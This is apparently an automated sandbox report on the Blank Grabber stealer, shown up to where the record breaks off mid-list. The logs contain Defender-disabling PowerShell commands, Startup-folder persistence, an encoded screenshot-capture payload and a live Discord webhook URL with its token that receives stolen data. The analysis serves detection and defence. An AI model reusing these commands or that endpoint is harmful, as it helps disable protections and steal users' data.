              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\cmd.exe", ParentImage: C:\Users\user\Desktop\cmd.exe, ParentProcessId: 7280, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'", ProcessId: 7332, ProcessName: cmd.exe
              Sigma detected: SCR File Write Event
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Screensaver Binary File Creation
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\cmd.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8300, TargetFilename: C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9148, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *, ProcessId: 9204, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7340, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7484, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6044, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: cmd.exe.7280.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0"}
              Multi AV Scanner detection for submitted file
              Source: cmd.exeReversingLabs: Detection: 36%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3F901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,65_2_00007FF69A3F901C
              Source: cmd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: cmd.exe, 00000001.00000002.2106778885.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: cmd.exe, 00000001.00000002.2107248205.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: cmd.exe, 00000001.00000002.2105906140.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000041.00000000.1938364077.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdb source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdbhP source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: cmd.exe, 00000001.00000002.2107479396.00007FFE13301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: cmd.exe, 00000001.00000002.2101639758.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: cmd.exe, 00000001.00000002.2105061798.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: cmd.exe, 00000001.00000002.2105587009.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: )i.pdb source: powershell.exe, 0000002A.00000002.1915922706.00000216A4BB6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: cmd.exe, 00000001.00000002.2107751391.00007FFE13331000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: cmd.exe, 00000001.00000002.2105325798.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB390000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF70AEF83B0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AEF92F0 FindFirstFileExW,FindClose,0_2_00007FF70AEF92F0
              Source: C:\Users\user\Desktop\cmd.exeCode function: 0_2_00007FF70AF118E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF70AF118E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF69A4046EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A3FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF69A3FE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exeCode function: 65_2_00007FF69A4488E0 FindFirstFileExA,65_2_00007FF69A4488E0
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2eP5UOyLvUjSMysvJJlJbg0 HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 699973User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=deddcaf575f75e2dd616d5b567df1560
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 18:44:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1732387481x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dnofcTgJO77a0qvnY06ZSBgJThFUi8RPU8CzONyuww46HrhNSYoQIulPhbjpsHEv8wynrDDGIVboMnd6LkVRJj0bS6cflMBGGEW9Mg25a0WM87vZtObL%2FuVdqpj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=bfbee4d8f0c66307eb752299893c7bde277a9e1d-1732387480; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=r8z8dclj1LJ.4o5SqnVjdAiCBtWH7bkTOCEb1MOHljw-1732387480233-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e734fba9c4d8c7e-EWR
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, 